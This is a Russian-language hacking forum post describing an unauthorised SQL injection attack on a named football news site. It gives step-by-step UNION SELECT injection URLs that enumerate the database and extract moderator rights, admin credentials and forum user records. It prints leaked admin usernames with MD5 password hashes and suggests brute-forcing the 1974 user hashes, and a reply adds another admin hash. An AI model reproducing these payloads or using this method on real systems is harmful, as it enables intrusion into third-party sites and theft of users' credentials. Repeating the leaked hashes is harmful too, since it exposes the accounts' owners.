Сайт привлек меня не только тематикой, но и своими показтелями индекса цитирования - 2100,что не мало!! (http://www.pr-cy.ru analiz.php?url=www.euro-football.ru) Я решил просто поверхностно посмотреть его на наличие известных багов. Первый клик на одну из новостей на стартовой странице -бага была найдена сразу, там где ей и полагалось быть - в новостном двиге, скрипт shownews.php3 Чтобы не палить из пушки по воробьям, я сразу же попытался установить версию: Code: http://www.euro-football.ru/news/shownews.php3?num=56488 Заменив 56488 на version() я получил тот же ответ что и при http://www.euro-football.ru/news/shownews.php3?num=5 Уже зная наперед, что меня не поджидают проблемы связанные с подбором таблиц вслепую, я подобрал количество столбцов Code: http://www.euro-football.ru/news/shownews.php3?num=-56488+UNION+SELECT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* Далее было установлено число таблиц - 566 Code: http://www.euro-football.ru/news/shownews.php3?num=-56488+UNION+SELECT+1,2,count(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables/* Первой интересной таблицой оказалась табла EFM_Users, но похоже что вывести из нее инфу просто нереально и такая ситуация складывалась с многими таблицами, в.т.ч user и users Но я не отчаивался Продолжая копаться я обнарудил таблицу moderator.. логинов и паролей в ней не было, однако были ID и выставленные права для кажого модератора пример: Code: http://www.euro-football.ru/news/shownews.php3?num=-56488+UNION+SELECT+1,2,concat_ws(0x3a,moderatorid,forumid,canbanusers),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+moderator/* просмотреть все доступные колонки в этой таблице не составит труда)) Исследование продолжалось но у меня по прежнему не было того что мне нужно- логинов:паролей Тут я встретился с таблицой phpadslv_config Я вспомнил, как +toxa+ рассказывал про эту таблу, в теме http://techpowerup.com И я решил что эти пустозвоны точно держат в этой таблей админов и не ошибся, как и говорил +toxa+ все стояло по дефолту, пасс- чистый мд5 Code: http://www.euro-football.ru/news/shownews.php3?num=-56488+UNION+SELECT+1,2,concat(admin,char(58),admin_pw),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+phpadslv_config/* PHP: klinsmann:89b0c5c32c03a3936fe9913deaa38663 Однако я решил не останавливаться на этом и получить информацию о пользователях форума, сделать это оказалась не очень сложно: Code: http://www.euro-football.ru/news/shownews.php3?num=-56488+UNION+SELECT+1,2,Column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns+where+table_name=0x70687062625f63687573657273/* и соответсвенно: Code: http://www.euro-football.ru/news/shownews.php3?num=-56488+UNION+SELECT+1,2,concat_ws(0x3a,user_id,username,user_password,user_level),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+phpbb_chusers+limit+5,1/* 1974 пользователя Остаеться только бросить хэши в брут =) З.Ы А вообще сайт неплохой, свежии новости, нормальный диз..
таблица phpbb_chusers - это не та таблица, которая относится к форуму , это хз какая; а от форума стоит дефолтная табла : админ 2:KLINSMANN:0826cfb11ed16d93f8a11b5271d1008e
